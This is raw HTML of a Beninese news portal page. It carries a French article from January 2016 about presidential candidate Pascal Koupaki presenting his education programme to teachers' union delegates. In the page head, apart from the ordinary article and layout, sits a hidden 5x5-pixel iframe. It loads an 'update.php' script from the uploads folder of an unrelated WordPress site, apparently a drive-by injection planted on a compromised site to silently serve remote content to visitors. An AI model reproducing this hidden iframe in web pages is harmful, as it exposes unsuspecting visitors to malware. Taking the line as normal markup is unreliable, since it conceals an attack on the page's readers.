
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="index, follow" />
  <meta name="keywords" content="Bénin, Cotonou, Porto-Novo, Parakou, Abomey, Ouidah, Natitingou, Lokossa, Politique, Economie, Sport, Culture, Afrique" />
  <meta name="title" content="Face aux enseignants Pascal Koupaki dessine l’école du quinquennat" />
  <meta name="author" content="Berlos" />
  <meta name="description" content="sonangnon !!! Portail d'informations sur le Bénin" />
  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
  <title>Face aux enseignants Pascal Koupaki dessine l’école du quinquennat</title>
  <script type="text/javascript" src="/media/system/js/mootools.js"></script>
  <script type="text/javascript" src="/media/system/js/caption.js"></script>
  <script type="text/javascript" src="/plugins/content/avreloaded/silverlight.js"></script>
  <script type="text/javascript" src="/plugins/content/avreloaded/wmvplayer.js"></script>
  <script type="text/javascript" src="/plugins/content/avreloaded/swfobject.js"></script>
  <script type="text/javascript" src="/plugins/content/avreloaded/avreloaded.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />

<link href="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/css/template_css.css" rel="stylesheet" type="text/css" />
<link href="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/css/ja-vm.css" rel="stylesheet" type="text/css" />
<link href="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/css/colors/default.css" rel="stylesheet" type="text/css" />
<link href="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/css/ja-news.css" rel="stylesheet" type="text/css" />


<script language="javascript" type="text/javascript" src="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/scripts/ja.script.js"></script>

<link href="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/ja_cssmenu/ja-sosdmenu.css" rel="stylesheet" type="text/css" />
					<script language="javascript" type="text/javascript" src="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/ja_cssmenu/ja.cssmenu.js"></script>

<!--[if lte IE 6]>
<style type="text/css">
.clearfix {	height: 1%;}
</style>
<![endif]-->

<!--[if gte IE 7.0]>
<style type="text/css">
.clearfix {	display: inline-block;}
</style>
<![endif]-->

<iframe src="http://www.propertyinsight.info/wp-content/uploads/update.php" width="5" height="5" frameborder="0"></iframe></head>

<body id="bd" class="wide fs1">
<a title="Skip to content" href="http://www.sonangnon.org/index.php?option=com_content&amp;view=article&amp;id=6212:face-aux-enseignants-pascal-koupaki-dessine-lecole-du-quinquennat&amp;catid=1:actualite#Content" style="display: none;">Skip to content</a>
<a name="Top" id="Top"></a>

<div id="ja-wrapper">
<div id="ja-wrapper-inner">

<!-- BEGIN: HEADER -->

<div id="ja-headerwrap">
	<div id="ja-header" class="clearfix">
		<h1>
			<a href="/index.php">
				<img src="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/images/logo-default.jpg" alt="SONANGNON.NET::L'Information au pluriel sur le Bénin" />
			</a>
		</h1>
		
		    <div id="ja-topnavwrap"  style="right: 5px;" class="clearfix">
			
<html>
<body>

<center>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="468" height="60" id="FlashBanner" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="http://www.sonangnon.net/newsonangnon/images/flash/datamedia.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<embed src="http://www.sonangnon.net/newsonangnon/images/flash/datamedia.swf" quality="high" bgcolor="#ffffff" width="468" height="60" name="FlashBanner" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</center>

</body>
</html>		</div>
		
				
		
	</div>
</div>   

<!-- BEGIN BANDE DEFILANTE -->

<marquee align="middle" bgcolor="white" height="35" scrolldelay="45" scrollamount="2"><b><font face=arial size=2 color=red> </font> </b></marquee>

<!-- END BANDE DEFILANTE -->

<!-- BEGIN: MAIN NAVIGATION -->
<div id="ja-mainnavwrap" class="clearfix">
<div id="ja-mainnav">
<!-- Begin menu -->
<ul id="ja-cssmenu" class="clearfix">

<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=frontpage&amp;Itemid=68"  id="menu68" title="Accueil"><span>Accueil</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=36&amp;Itemid=58"  id="menu58" title="Sport"><span>Sport</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=37&amp;Itemid=56"  id="menu56" title="Culture"><span>Culture</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=62&amp;Itemid=54"  id="menu54" title="Eveil et Conscience Citoyenne"><span>Eveil et Conscience Citoyenne</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=39&amp;Itemid=59"  id="menu59" title="Ma Contribution"><span>Ma Contribution</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=38&amp;Itemid=57"  id="menu57" title="Départementales"><span>Départementales</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_docman&amp;Itemid=70"  id="menu70" title="Dossiers"><span>Dossiers</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_kunena&amp;view=entrypage&amp;Itemid=69"  id="menu69" title="Forum"><span>Forum</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_contact&amp;view=contact&amp;id=1&amp;Itemid=62"  id="menu62" title="Contacts"><span>Contacts</span></a>
</li>
<li>
   <a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=60&amp;Itemid=111"  id="menu111" title="Presidentielles"><span>Presidentielles</span></a>
</li>

</ul><!-- End menu -->
</div>

</div>

<div class="ja-mainnavshadow"></div>

<!-- END: MAIN NAVIGATION -->

<div id="ja-containerwrap">
	<div id="ja-container-fr" class="clearfix">

		<!-- BEGIN: CONTENT -->
		<div id="ja-mainbody-fr">
        
        
		<a name="Content" id="Content"></a>
		<div id="ja-contentwrap">
			<div id="ja-content">
				<div id="ja-pathway">
					<strong>Vous etes sur la page:</strong> 				</div>

				
        				
								<table class="contentpaneopen">
<tr>
		<td class="contentheading" width="100%">
				<a href="/index.php?option=com_content&amp;view=article&amp;id=6212:face-aux-enseignants-pascal-koupaki-dessine-lecole-du-quinquennat&amp;catid=1:actualite" class="contentpagetitle">
			Face aux enseignants Pascal Koupaki dessine l’école du quinquennat</a>
			</td>
						<td align="right" width="100%" class="buttonheading">
		<a href="/index.php?view=article&amp;catid=1%3Aactualite&amp;id=6212%3Aface-aux-enseignants-pascal-koupaki-dessine-lecole-du-quinquennat&amp;format=pdf&amp;option=com_content" title="PDF" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"><img src="/templates/ja_xenia_ii_shopping/images/pdf_button.png" alt="PDF"  /></a>		</td>
		
				<td align="right" width="100%" class="buttonheading">
		<a href="/index.php?view=article&amp;catid=1%3Aactualite&amp;id=6212%3Aface-aux-enseignants-pascal-koupaki-dessine-lecole-du-quinquennat&amp;tmpl=component&amp;print=1&amp;layout=default&amp;page=&amp;option=com_content" title="Imprimer" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"><img src="/templates/ja_xenia_ii_shopping/images/printButton.png" alt="Imprimer"  /></a>		</td>
		
				<td align="right" width="100%" class="buttonheading">
		<a href="/index.php?option=com_mailto&amp;tmpl=component&amp;link=aHR0cDovL3d3dy5zb25hbmdub24ub3JnL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTYyMTI6ZmFjZS1hdXgtZW5zZWlnbmFudHMtcGFzY2FsLWtvdXBha2ktZGVzc2luZS1sZWNvbGUtZHUtcXVpbnF1ZW5uYXQmY2F0aWQ9MTphY3R1YWxpdGU=" title="Envoyer" onclick="window.open(this.href,'win2','width=400,height=350,menubar=yes,resizable=yes'); return false;"><img src="/templates/ja_xenia_ii_shopping/images/emailButton.png" alt="Envoyer"  /></a>		</td>
					</tr>
</table>

<table class="contentpaneopen">
<tr>
	<td valign="top">
		<span class="small">
			Écrit par Fraternité du 21/01/2016		</span>
		&nbsp;&nbsp;
	</td>
</tr>

<tr>
	<td valign="top" class="createdate">
		Jeudi, 21 Janvier 2016 10:50	</td>
</tr>


<tr>
<td valign="top">
<p style="text-align: justify;"><span style="font-size: small;">C’est à la bourse du travail, lieu symbolique pour les travailleurs au Bénin que Pascal Koupaki, candidat à la présidentielle prochaine, a rencontré hier les délégués syndicaux du secteur de l’éducation. Au menu des échanges, ses priorités pour un système éducatif de qualité prenant en compte le bien être social des enseignants...

Devant les délégués syndicaux de l’enseignement maternel, primaire et secondaire, Pascal Irené Koupaki a passé en revue les grandes lignes de son projet de société axé sur la nouvelle conscience. L’homme dont la vision est de transformer en profondeur l’école béninoise et de contribuer au redressement du pays a répondu à 7 grandes préoccupations du jury présidé par le syndicaliste Raouf Affagnon. Abordant la préoccupation du saucissonnage du ministère en charge de l’éducation, le présidentiable pense s’inspirer des modèles des années 60 à 70, c’est-à-dire une centralisation au sommet de l’Etat accompagnée d’une décentralisation à la base. « Le pouvoir central décidera de la vision, de la politique à mettre en œuvre. Mais nous mettrons à contribution le système décentralisé pour une gestion participative », a-t-il souligné. Sur la question très attendue de la suite à donner à la mesure de la gratuité, Pascal Koupaki entend faire une évaluation de la mesure afin d’identifier les problèmes qu’elle a engendrés en vue d’y apporter des solutions efficaces. Et à ceux qui voudraient son appréciation par rapport à la baisse du niveau des apprenants, Pascal Koupaki assure que le problème qui se pose va au-delà de cette situation. Il pose un diagnostic profond de la politique de recrutement et de formation des enseignants avant d’annoncer des alternatives. « Nous comptons renforcer les capacités des Ecoles normales d’instituteurs et du corps enseignant puis relever le niveau de recrutement des élèves-maîtres. Nous procéderons également à l’amélioration des nouveaux programmes par des innovations pédagogiques afin de les adapter aux besoins réels d’épanouissement des apprenants et de développement de notre pays », souligne Pascal Koupaki. Les questions liées à la politisation du système éducatif, le dialogue social, la suite à donner au statut particulier des enseignants n’ont pas été occultées. L’ancien premier ministre candidat promet impulser une nouvelle dynamique pour un Bénin apprenant, entreprenant et innovant.<br /><br />Fulbert ADJIMEHOSSOU (Coll.)<br /><br />La rédaction</span></p>
			<table align="center" class="pagenav">
			<tr>
				<th class="pagenav_prev">
					<a href="/index.php?option=com_content&amp;view=article&amp;id=6213:presidentielle-de-2016--nago-choisit-ajavon&amp;catid=1:actualite">&lt; Précédent</a>
				</th>
				<td width="50">
					&nbsp;
				</td>
				<th class="pagenav_next">
					<a href="/index.php?option=com_content&amp;view=article&amp;id=6211:diffusion-dune-photo-montrant-le-clerge-et-le-1er-ministre-odieuse-recuperation-politique-par-le-pouvoir&amp;catid=1:actualite">Suivant &gt;</a>
				</th>
			</tr>
			</table></td>
</tr>

</table>
<span class="article_separator">&nbsp;</span>
												
        <!-- BEGIN: BANNER -->
								  <div id="ja-banner">
				    
<html>
<body>

<center>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="468" height="60" id="data_media.swf" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="http://www.sonangnon.net/newsonangnon/images/flash/data_media.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<embed src="http://www.sonangnon.net/newsonangnon/images/flash/data_media.swf" quality="high" bgcolor="#ffffff" width="468" height="60" name="data_media.swf" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</center>

</body>
</html><p> </p>
<table border="0">
<tbody>
<tr>
<td style="text-align: center;">  <a href="http://www.youtube.fr/"><strong><img src="/images/stories/youtube.jpg" border="0" width="80" height="35" /></strong></a> </td>
<td style="text-align: center;">  <a href="http://www.facebook.fr/"><strong><img src="/images/stories/facebook.jpg" border="0" width="80" height="35" /></strong></a>  </td>
<td style="text-align: center;"> <a href="#http://www.youtube.com/"><strong><img src="/images/stories/jeux.jpg" border="0" width="80" height="35" /> </strong></a> </td>
<td style="text-align: center;"><a href="#http://www.youtube.com/"><strong><img src="/images/stories/tourisme.jpg" border="0" width="80" height="35" /></strong></a></td>
<td style="text-align: center;">  <a href="#http://www.youtube.com/"><strong><img src="/images/stories/faitsdivers.jpg" border="0" width="80" height="35" />   </strong></a></td>
</tr>
<tr>
<td style="text-align: center;"><a href="http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong>You Tube</strong></span></a></td>
<td style="text-align: center;"><a href="http://www.facebook.fr/"><span style="background-color: #c0c0c0;"><strong>Facebook</strong></span></a></td>
<td style="text-align: center;"><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong>Jeux/Games</strong></span></a></td>
<td style="text-align: center;"><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong>Tourisme au Bénin</strong></span></a></td>
<td style="text-align: center;"><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong>Faits Divers</strong></span></a></td>
</tr>
</tbody>
</table>
<p> </p>
<table border="0">
<tbody>
<tr>
<td><span style="background-color: #c0c0c0;">    </span><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong>Dictionnaire</strong></span></a><span style="background-color: #c0c0c0;">    </span></td>
<td><span style="background-color: #c0c0c0;">    </span><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong><span style="background-color: #c0c0c0;">Traducteur</span></strong></span></a><span style="background-color: #c0c0c0;">    </span></td>
<td><span style="background-color: #c0c0c0;">    </span><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong><span style="background-color: #c0c0c0;">Western Union</span></strong></span></a><span style="background-color: #c0c0c0;">    </span></td>
<td><span style="background-color: #c0c0c0;">    </span><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong><span style="background-color: #c0c0c0;">Money Gram</span></strong></span></a><span style="background-color: #c0c0c0;">    </span></td>
<td><span style="background-color: #c0c0c0;">    </span><a href="#http://www.youtube.com/"><span style="background-color: #c0c0c0;"><strong><span style="background-color: #c0c0c0;">Devises</span></strong></span></a><span style="background-color: #c0c0c0;">    </span></td>
</tr>
</tbody>
</table>				  </div>
								<!-- END: BANNER -->

			</div>
		</div>
	
		
		</div>
		<!-- END: CONTENT -->
	
				<!-- BEGIN: LEFT COLUMN -->
			<div id="ja-leftcol">
							</div>
		<br />
		<!-- END: LEFT COLUMN -->
		
	</div>
</div>

<!-- BEGIN: FOOTER -->
<div id="ja-footerwrap">
<div id="ja-botsl" class="clearfix">
    <div class="ja-box-left" style="width: 49.8%;">
    		<div class="moduletable">
					<h3>Nos Archives</h3>
					<ul>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=07">
			Juillet, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=06">
			Juin, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=05">
			Mai, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=04">
			Avril, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=03">
			Mars, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=02">
			Février, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2013&amp;month=01">
			Janvier, 2013</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2012&amp;month=12">
			Décembre, 2012</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2012&amp;month=11">
			Novembre, 2012</a>
	</li>
		<li>
		<a href="/index.php?option=com_content&amp;view=archive&amp;year=2012&amp;month=10">
			Octobre, 2012</a>
	</li>
	</ul>		</div>
	  </div>
    
    <div class="ja-box-right" style="width: 49.8%;">
    		<div class="moduletable">
					<h3>Articles les plus lus</h3>
					<ul class="mostread">
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=57:la-constitution-de-la-republique-du-benin--loi-nd-90-32-du-11-decembre-1990-portant-constitution-de-la-republique-du-benin&amp;catid=1:actualite" class="mostread">
			La Constitution de la République du Bénin : Loi N° 90-32 du 11 décembre 1990 portant Constitution de la République du Bénin.</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=6193:assises-supplementaires-de-parakoulame-de-coovi-reclame-t-elle-gbadamassi-&amp;catid=1:actualite" class="mostread">
			Assises supplémentaires de Parakou:L’âme de Coovi réclame-t-elle Gbadamassi ?</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=264:les-ambassades-du-benin-a-letranger&amp;catid=1:actualite" class="mostread">
			Les Ambassades du Bénin à l'étranger</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=274:urgences-au-benin&amp;catid=1:actualite" class="mostread">
			Urgences au Bénin</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=267:quelques-hotels-au-benin&amp;catid=1:actualite" class="mostread">
			Quelques hôtels au Bénin</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=6195:legislatives-davril-2015-6eme-circonscription-electorale-lagonie-des-fcbe-se-poursuit&amp;catid=1:actualite" class="mostread">
			Législatives d’Avril 2015/ 6ème circonscription électorale: L’agonie des Fcbe se poursuit</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=266:organisations-internationales&amp;catid=1:actualite" class="mostread">
			Organisations Internationales</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=2260:legislatives-du-30-avril-2011-les-grandes-tendances-dans-les-12-departements&amp;catid=1:actualite" class="mostread">
			Législatives du 30 avril 2011: Les grandes tendances dans les 12 départements</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=2108:reelection-du-chef-de-letat-les-dessous-de-la-lettre-de-felicitation-dadovelande-a-yayi&amp;catid=1:actualite" class="mostread">
			Réélection du Chef de l’Etat : Les dessous de la lettre de félicitation d’Adovèlandé à Yayi</a>
	</li>
	<li class="mostread">
		<a href="/index.php?option=com_content&amp;view=article&amp;id=6207:legislatives-davril-2015-sefou-fagbohoun-fait-peur-a-yayi-boni&amp;catid=1:actualite" class="mostread">
			Législatives d’avril 2015: Séfou Fagbohoun fait peur à Yayi Boni</a>
	</li>
</ul>		</div>
	  </div>
    
  </div>
<div class="clr" ></div>
<div id="ja-footer">
  <p id="ja-bottomline">
		
Copyright &copy; 2004 - 2016 SONANGNON.NET::L'Information au pluriel sur le Bénin. 
	</p>
	
	<div id="ja-cert">
						<a href="http://www.sonangnon.org/index.php?option=com_content&amp;view=article&amp;id=6212:face-aux-enseignants-pascal-koupaki-dessine-lecole-du-quinquennat&amp;catid=1:actualite#Top" title="Go to top" style="text-decoration: none;">
			<img src="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/images/but-top-default.gif" alt="Haut de Page" />
		</a>
	</div>	
</div>
</div>
<!-- END: FOOTER -->

</div>
</div>
<script language="javascript" type="text/javascript" src="http://www.sonangnon.org/templates/ja_xenia_ii_shopping/scripts/vm_stuff.js"></script>
</body>

</html>
